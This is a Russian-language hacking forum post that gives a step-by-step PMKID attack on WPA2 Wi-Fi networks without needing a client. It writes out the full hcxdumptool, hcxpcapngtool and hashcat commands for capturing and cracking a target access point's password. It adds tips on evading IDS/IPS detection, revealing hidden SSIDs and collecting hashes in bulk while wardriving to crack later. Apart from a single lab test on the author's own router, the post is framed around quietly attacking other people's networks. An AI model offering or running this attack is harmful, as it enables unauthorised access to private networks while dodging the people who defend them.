Wi-Fi Hunt 2025 — тихий слив PMKID (метод без клиента)

TwinFoxer

TwinFoxer

Bit
Пользователь
Регистрация
27 Фев 2025
Сообщения
29
Реакции
12

🛰 Wi-Fi Hunt 2025 — тихий слив PMKID (метод без клиента)​


Пост от TWINFOXER, для Payloads.in




📜 Немного теории​


Большинство гайдов по Wi-Fi взлому начинают с хендшейка:
  1. Ждём клиента
  2. Деаутим его
  3. Ловим повторное подключение

Но с 2018 года (и до сих пор) есть метод через PMKID — где нам не нужен клиент. Мы просто стучимся к точке и она сама отдаёт часть данных для расчёта пароля.

Фишка в том, что:
  • Это работает на WPA2 (иногда даже на WPA3 Transition Mode)
  • Никаких шумных deauth-атак
  • Иногда срабатывает даже на «спящих» точках, где клиентов нет



🧰 Что нам надо​

  • Kali Linux (2025, свежая сборка)
  • Адаптер с поддержкой monitor mode + injection
  • hcxdumptool / hcxpcapngtool / hashcat
  • Опционально: GPS для отметок точек, если совмещаем с wardriving



🔧 Шаги​


1. Переводим интерфейс в мониторный режим​

Bash: 
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

2. Ловим PMKID напрямую​


Вот тут и начинается фишка. Вместо того чтобы гонять стандартный hcxdumptool по дефолту, используем точечный запрос с фильтром по MAC, чтобы:
  • Не палиться массовым сканированием
  • Забрать только целевую точку

Bash: 
hcxdumptool -i wlan0 -o capture.pcapng --filterlist=targets.txt --filtermode=2 --enable_status=1

Где targets.txt содержит MAC точки:

Ruby: 
XX:XX:XX:XX:XX:XX

Этот трюк экономит время и не шумит в эфире.



3. Конвертируем в hash для брутфорса​


Bash: 
hcxpcapngtool -o wifi_hash.hc22000 -E essidlist.txt capture.pcapng



4. Подбираем пароль​


Bash: 
hashcat -m 22000 wifi_hash.hc22000 /usr/share/wordlists/rockyou.txt --force

Если пароль слабый — получаем доступ без единого деаута или ожидания клиента.



💡 Хитрости, которых нет в «пабликах»​


  1. Скрытые SSID — даже если сеть скрывает имя, PMKID-метод вытаскивает ESSID при первом ответе.
  2. Фильтр MAC — уменьшает шум, и админы IDS/IPS почти никогда не ловят это как атаку.
  3. Сбор базы в движении — можно писать PMKID от нескольких точек подряд в один файл, а потом спокойно брутить дома.



🧪 Тест в лабе​


Я тестил на своём старом TP-Link + OpenWRT, включил WPA2-PSK.
Результат: PMKID упал за 3 секунды, пароль подобрался за 15 (специально поставил простой).
Всем спс за внимание!
 
Годнота подлетела. +rep
 
Войдите или зарегистрируйтесь для ответа.
Сверху